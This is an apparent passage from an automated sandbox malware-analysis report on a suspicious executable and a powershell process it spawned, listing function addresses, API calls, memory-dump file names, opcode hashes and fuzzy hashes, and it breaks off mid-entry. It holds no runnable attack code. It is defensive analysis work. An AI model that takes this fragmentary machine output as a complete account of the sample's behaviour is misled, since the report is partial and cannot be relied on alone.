lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\demand_rpkb_060923.exe,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00405ADC
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\demand_rpkb_060923.exe,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00405AEA

Strings

C:\Users\user\Desktop, xrefs: 00405AD6

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6328, Parent PID: 5428COMMON

Executed Functions

Function 032DD020 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8405105bf8535f0ecd1257ebbce99aadce9c9ee1f6c510d50f6d29bf52fecf
Instruction ID: a127ced5864d0a60e4a2c47b3c6c761fec93fcb68b4beedfd3472cb9143a9ad0
Opcode Fuzzy Hash: ee8405105bf8535f0ecd1257ebbce99aadce9c9ee1f6c510d50f6d29bf52fecf
Instruction Fuzzy Hash: F211E430304740AFD71687399494B7ABBE6EFCA314F1844BDD14A8B791DB2ADC46C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 078DB6DC Relevance: 13.4, Strings: 9, Instructions: 2130COMMON

Download Yara Rule

Strings

$6q, xrefs: 078DB767
4'6q, xrefs: 078DB79B
tP6q, xrefs: 078DC2A1
4'6q, xrefs: 078DB78F
tP6q, xrefs: 078DC2AD
$6q, xrefs: 078DB773
tP6q, xrefs: 078DC17F
$6q, xrefs: 078DB74B
tP6q, xrefs: 078DC18B

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q$tP6q$tP6q$tP6q$tP6q$$6q$$6q$$6q
API String ID: 0-92898299
Opcode ID: 81598de7a665d66d26ffa4cca1d9149097b58c0e98a82b235c1ed679fc9a7558
Instruction ID: cb920b02054271d60df0ad895a1fb5e6cb74a74e7f6438701ca197f0d35617c3
Opcode Fuzzy Hash: 81598de7a665d66d26ffa4cca1d9149097b58c0e98a82b235c1ed679fc9a7558
Instruction Fuzzy Hash: 9382F4F5B002099FCB15DF68C450AAABFE2BF95325F19806AE905CB351DB32DC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078DAEE8 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

$6q, xrefs: 078DB626
tP6q, xrefs: 078DB235
$6q, xrefs: 078DB60E
tP6q, xrefs: 078DAFFC
tP6q, xrefs: 078DB22B
$6q, xrefs: 078DB632
tP6q, xrefs: 078DB008

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: tP6q$tP6q$tP6q$tP6q$$6q$$6q$$6q
API String ID: 0-1235792330
Opcode ID: a8038da3d3337d56e68e58771377b8007a6e11c2dde8e55f84c6112e6198f60d
Instruction ID: 4637d1e0c27dfd88887f22112299aa943a9b314cfeb262bbb16ee1c8813a031f
Opcode Fuzzy Hash: a8038da3d3337d56e68e58771377b8007a6e11c2dde8e55f84c6112e6198f60d
Instruction Fuzzy Hash: BE1202F5B002099FCB14CF68C450AAABFE2EF95315F25C46AE915DB391DA32DC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078D1D80 Relevance: 5.5, Strings: 4, Instructions: 464COMMON

Download Yara Rule

Strings

Z"l, xrefs: 078D1DAD
$6q, xrefs: 078D2466
$6q, xrefs: 078D2472
Z"l, xrefs: 078D1DB7

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: $6q$$6q$Z"l$Z"l
API String ID: 0-2485405476
Opcode ID: ce937125ef75dc80204bc156f36646ff2e1a6977d7537dccbbd8d35246994bd0
Instruction ID: ad1d33649d1503cc5f2b31651a837c8fb477b51701871fb26c7661110c34c937
Opcode Fuzzy Hash: ce937125ef75dc80204bc156f36646ff2e1a6977d7537dccbbd8d35246994bd0
Instruction Fuzzy Hash: CE026DB4B00209AFD714CF58C554AAABBF2BF99314F29C06AD805EB355DB72EC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 078D5319 Relevance: 5.3, Strings: 4, Instructions: 323COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D5581
4'6q, xrefs: 078D5600
4'6q, xrefs: 078D558D
4'6q, xrefs: 078D560C

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q$4'6q$4'6q
API String ID: 0-4201756503
Opcode ID: 20fa7010bb3f43a52bff632acfb739a5f65c4aadf210d7e5568f25994df6e5b4
Instruction ID: e543ba2f1c1beb8ab343120de11a0ed2c76b745890fd5757235b27acb6c581b2
Opcode Fuzzy Hash: 20fa7010bb3f43a52bff632acfb739a5f65c4aadf210d7e5568f25994df6e5b4
Instruction Fuzzy Hash: 17C1A3B4F0020AAFD714CFA8C454B6EBBB3AF94319F24C419D901AF355CA76ED858B91

Uniqueness

Uniqueness Score: -1.00%

Function 078D4378 Relevance: 4.5, Strings: 3, Instructions: 762COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D457C
4'6q, xrefs: 078D4588
4'6q, xrefs: 078D4610

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q$4'6q
API String ID: 0-2088079533
Opcode ID: 683d7e54a48722102107924f3d868c01142a7368dbfe29af8fbaa710817401bc
Instruction ID: 5025d5614202bc9cac55cf2ddab601c563fe0b733eb0d84622d382dfee321398
Opcode Fuzzy Hash: 683d7e54a48722102107924f3d868c01142a7368dbfe29af8fbaa710817401bc
Instruction Fuzzy Hash: D4628CB4B00249AFDB14CF98C454B6DBBB2AF99318F64C069D909AF355CB72EC85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 072904E8 Relevance: 4.5, Strings: 3, Instructions: 704COMMON

Download Yara Rule

Strings

d%<q, xrefs: 07290584
d%<q, xrefs: 07290834
d%<q, xrefs: 0729057A

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: d%<q$d%<q$d%<q
API String ID: 0-2004102169
Opcode ID: 5ef18c7c5901700427ce49351d19ef64e276160d1ba2ced97a074ffbe9132619
Instruction ID: e944466069265e7b2aee8239eaf078902195ac5954dd03dab9b4b1f0e96f5fed
Opcode Fuzzy Hash: 5ef18c7c5901700427ce49351d19ef64e276160d1ba2ced97a074ffbe9132619
Instruction Fuzzy Hash: DB623A74A1124A9FDF15CF98C484AADBBF2FF48324F288569E805AB351C775ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072912E0 Relevance: 4.1, Strings: 3, Instructions: 371COMMON

Download Yara Rule

Strings

(<q, xrefs: 07291388
(<q, xrefs: 0729137E
(<q, xrefs: 0729166E

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: (<q$(<q$(<q
API String ID: 0-739058753
Opcode ID: 9fd2027d7f170f5d0e931858f32b4a5ad7e1da81d25c5099a42fa770b37c7d3c
Instruction ID: cbbd483a04af7a80aa4a58af594349a6114bc91a76db225839c764e33b0cb137
Opcode Fuzzy Hash: 9fd2027d7f170f5d0e931858f32b4a5ad7e1da81d25c5099a42fa770b37c7d3c
Instruction Fuzzy Hash: F2F14A74A1020A9FCF15CF99D484AAEBBF2FF48314F288569E815AB351D735EC91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 078D3642 Relevance: 3.1, Strings: 2, Instructions: 563COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D3B16
4'6q, xrefs: 078D3B0A

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q
API String ID: 0-3049178811
Opcode ID: 547dd483b0f262b87c0ff459c3390ce737ced27be92a8ab2ddb8a705b8cfdcec
Instruction ID: 8fbd67d2a8cc6e693ff1efba0d88b2a95e8d54e84f79914db988889ba0391cb9
Opcode Fuzzy Hash: 547dd483b0f262b87c0ff459c3390ce737ced27be92a8ab2ddb8a705b8cfdcec
Instruction Fuzzy Hash: FF3280B4B00204EFD724CB68C855F69BBB2AB94318F24C1A9D905AF752CB76ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 078D472C Relevance: 3.1, Strings: 2, Instructions: 563COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D457C
4'6q, xrefs: 078D4610

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q
API String ID: 0-3049178811
Opcode ID: 4d37dbf3b5e617a9042db060db51ce07f06a952b6c158bd7dfbfb0f367931a9f
Instruction ID: 98d60dd0ab525f0b4d00ea5e1a9372085e9dd00f6bb32ae66a732dd8a54a165c
Opcode Fuzzy Hash: 4d37dbf3b5e617a9042db060db51ce07f06a952b6c158bd7dfbfb0f367931a9f
Instruction Fuzzy Hash: C3326BB4B00249AFDB14CF98C444F6DBBB2AB99318F55C099D909AF356CB72EC85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 078D928D Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D9744
4'6q, xrefs: 078D9750

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q
API String ID: 0-3049178811
Opcode ID: 10446d62e6b7a1b82b6a61b53964b3f69abca2ab7e90c3f100604d0d673e06cc
Instruction ID: 4423e58bded06e433a33b8f31c02505271f969a555d5fdae56d9c8d5b19ff11e
Opcode Fuzzy Hash: 10446d62e6b7a1b82b6a61b53964b3f69abca2ab7e90c3f100604d0d673e06cc
Instruction Fuzzy Hash: A422C3B4B40219AFD724CF18C851BA9BBB2EF94314F14C0A8D909AF751DB76ED818F91

Uniqueness

Uniqueness Score: -1.00%

Function 072904A2 Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

d%<q, xrefs: 07290584
d%<q, xrefs: 0729057A

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: d%<q$d%<q
API String ID: 0-333442232
Opcode ID: b6bd93a9e373ffc46086f7a1cc07214a939d17eba58bbc16d88f9362c2a96217
Instruction ID: 13e0ffb0293a4c274590813e053ac03e3f240fcc44bca6f4206a1ea1f2a718e3
Opcode Fuzzy Hash: b6bd93a9e373ffc46086f7a1cc07214a939d17eba58bbc16d88f9362c2a96217
Instruction Fuzzy Hash: 034160B4A0524A9FCB11CF58C4949ADFFB6FF49310B2885A9D449EB352C336EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 072912D0 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

(<q, xrefs: 07291388
(<q, xrefs: 0729137E

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: (<q$(<q
API String ID: 0-592308820
Opcode ID: 3ab25f84a2479e2af1e81fe8cce215b2b25a8d64cf9dd7757fd0049e53ee01a6
Instruction ID: fa2d2a32a3adecb5d0a3399681166b00303b5cd57e292cc2222ab90487839e80
Opcode Fuzzy Hash: 3ab25f84a2479e2af1e81fe8cce215b2b25a8d64cf9dd7757fd0049e53ee01a6
Instruction Fuzzy Hash: 37411178A0060A8FCB14CF9DC4849AEBBF5FF48314B248669E915E7755D331EC51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 07293D60 Relevance: 1.4, Instructions: 1403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9865e030a430b6624955f3ec099784840df5bd26e95d0265ecfa186402edc84b
Instruction ID: 3ccc61341f96233a010abb962c711dee0917cfef907adecb2f4f50b2dd9f6f1e
Opcode Fuzzy Hash: 9865e030a430b6624955f3ec099784840df5bd26e95d0265ecfa186402edc84b
Instruction Fuzzy Hash: E4022074A102499FCF15DF98C480AAEBBB2FF48314F28C569E815A7355D736EC92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07291629 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

(<q, xrefs: 0729166E

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: (<q
API String ID: 0-1240477307
Opcode ID: a0d77560841773331a4c8b279d93f12033f20e35019306cfec8ea80362543bd6
Instruction ID: 536cecd2358f6a81783f87fb968a7e1b89012d552c1b938e79069212e1d6c1fb
Opcode Fuzzy Hash: a0d77560841773331a4c8b279d93f12033f20e35019306cfec8ea80362543bd6
Instruction Fuzzy Hash: E951F774A1020AAFDF05CF98D580A9DBBF2FF48314F288459E805A7361C736ED92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072907EF Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

d%<q, xrefs: 07290834

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID: d%<q
API String ID: 0-4285989654
Opcode ID: 2366810413e6b433c1a62f9569fa31fc40567cedca4c0d34fc9f6871aa2a4ad1
Instruction ID: ab87ff098dae9d9a2321721374ddf258927d52f0d49ddbcefa143adb80921855
Opcode Fuzzy Hash: 2366810413e6b433c1a62f9569fa31fc40567cedca4c0d34fc9f6871aa2a4ad1
Instruction Fuzzy Hash: 1451C674A1020ADFDB15CF98D484AADBBF2BF48314F288559E405AB365C776AD82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032D28F5 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

t3Jq, xrefs: 032D294C

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID: t3Jq
API String ID: 0-3466614075
Opcode ID: 83783df93499f81e5ea09c44d65e1e1f060307cd10778b5961fc8b188403016f
Instruction ID: 3b2874b5f995b9bd99ce1c1809cb4e0f7467f9585eb77ab01b5a89124398fe81
Opcode Fuzzy Hash: 83783df93499f81e5ea09c44d65e1e1f060307cd10778b5961fc8b188403016f
Instruction Fuzzy Hash: 5611363160474ADFCB19CB9CE4949EDFB72FF58320B58848AD051E7292C732A852C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 032D7DF0 Relevance: .6, Instructions: 642COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c539ce4ccc0cf3b33a10813b414ee5a2374ba9197e2116ff922409e95108160
Instruction ID: e5942f91ad582e4d54e8368ae600e51e657a756feb112be78c8637872ea9ba54
Opcode Fuzzy Hash: 7c539ce4ccc0cf3b33a10813b414ee5a2374ba9197e2116ff922409e95108160
Instruction Fuzzy Hash: 0B426E74A152499FCB05CFA8D480A9DFFF2AF49314F29C09AE404AB362C735ED85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07292320 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20037d6180b8e3e6652737b5d52582a4813e912afcf12c8e68a60de95533d20
Instruction ID: 21fd87b78298c90832af7417b9e2209d68b8784fea2ec874a9816b867c645e13
Opcode Fuzzy Hash: b20037d6180b8e3e6652737b5d52582a4813e912afcf12c8e68a60de95533d20
Instruction Fuzzy Hash: 13023B74A11259EFCB05CF98C890A9DBBF2FF49314F298169E805AB352C735EC85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07292D20 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f267be3407fbedd59994d22cbc8c86ded13a830ec7f89fb11baaf756c37082a6
Instruction ID: 1e1f5d637a3767dd6d88246445e56859d2a52c3d37c30938165f55ab2e078e64
Opcode Fuzzy Hash: f267be3407fbedd59994d22cbc8c86ded13a830ec7f89fb11baaf756c37082a6
Instruction Fuzzy Hash: C0F1F774A10249EFDF15CF98D484AADBBF2FF48314F288569E805AB365C735AC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072936E8 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fe76d5092b6480c6949811e50e0fd1bf66975c9752cafc296e727c306a303f
Instruction ID: f02dfe477b02b8efa6b430764a7bda2533619fac6d4a2fa4293cf32c1c767d66
Opcode Fuzzy Hash: e8fe76d5092b6480c6949811e50e0fd1bf66975c9752cafc296e727c306a303f
Instruction Fuzzy Hash: 3EF11B74A102099FDF15CF98D484AADBBF2FF48324F288569E805AB352C735ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D8EC8 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d3d617ad907c1f46d289adb495ba9334925482d3b667531b475b9816a97955
Instruction ID: 28874a9869f56efcc73c0e56f9f063b8158ca2244d138c659cd63091002fdd07
Opcode Fuzzy Hash: a5d3d617ad907c1f46d289adb495ba9334925482d3b667531b475b9816a97955
Instruction Fuzzy Hash: 21C14C34A112499FCB05CFA8D484A9DBFF2FF49324F69809AE444AB352C775ED85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D6BC0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8c487a5a4df711654a317fadbeacd31d5c7137da38301b0a05eec6ce0878c0
Instruction ID: b4935acae9d4af2576b29c32116b7133ca3a3dea027ea2c04a4387da216b4750
Opcode Fuzzy Hash: ea8c487a5a4df711654a317fadbeacd31d5c7137da38301b0a05eec6ce0878c0
Instruction Fuzzy Hash: B7A129346242558FCB15CB78D8449ADFFF6FF89310B1884A9E8419B366DB35DD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032D9724 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8249061cef1f085821ff740a8fbdb10a0cee115c394e987a12af7f7f5bf4e5a8
Instruction ID: e20a1f6a9b8aab2efdeb405270558ade0a7d1aba84e1cff134e9c1a47f27426e
Opcode Fuzzy Hash: 8249061cef1f085821ff740a8fbdb10a0cee115c394e987a12af7f7f5bf4e5a8
Instruction Fuzzy Hash: D9B10575A102599FDB05CFA8D484A9DBBB2BF88314F28C059E805AB351C775EDC2CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D2600 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa09178686e791b0446989293fde786b62c20fe360bdb9f45fc1c4c6f6cda5e
Instruction ID: e314b8a7eeaf9527c7f0de0e96edd144358333a10a4970e6100b4f63ba12a228
Opcode Fuzzy Hash: 3aa09178686e791b0446989293fde786b62c20fe360bdb9f45fc1c4c6f6cda5e
Instruction Fuzzy Hash: 09918F74A00606CFCB15CF5DC4949AEFBB6FF88310B248699D915AB356C736EC91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078D4FB8 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14c31505eb8855657dd84b4553de76b576e8681aaa3cc6c8921573e7bae702f
Instruction ID: 9c106ebfa45c6fb1d23ef8fcfe15d58596f9b663697ab7579164010d99a10d6b
Opcode Fuzzy Hash: e14c31505eb8855657dd84b4553de76b576e8681aaa3cc6c8921573e7bae702f
Instruction Fuzzy Hash: B07160B4E00209EFDB14CF58C450AADBBF2AF99314F24C16AD805AB754DB32ED91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 032D69B0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c914542e3f1c296bfa6c14282a237ce19ed8af3503d22cd0099af458129382fd
Instruction ID: 064e6fd493b8635f6f76e8aaa1f61eadd13533eb3558b4529c1e6d490ecad5e3
Opcode Fuzzy Hash: c914542e3f1c296bfa6c14282a237ce19ed8af3503d22cd0099af458129382fd
Instruction Fuzzy Hash: A951DF757202458FC741DB38D8818AABFF2BF8620075084AAE142CB7B2DA31ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07294115 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

